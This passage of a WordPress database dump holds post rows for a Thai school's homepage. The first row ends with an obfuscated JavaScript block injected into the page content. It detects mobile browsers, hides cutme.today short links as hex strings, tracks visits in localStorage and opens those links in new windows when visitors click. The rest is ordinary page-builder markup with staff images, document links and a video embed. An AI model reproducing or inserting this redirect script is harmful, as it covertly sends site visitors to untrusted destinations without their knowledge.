_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:24:42','2025-07-15 09:24:42','',19,'http://watprato.ssk.in.th/?p=715',0,'revision','',0),
(716,1,'2025-07-15 16:25:35','2025-07-15 09:25:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\"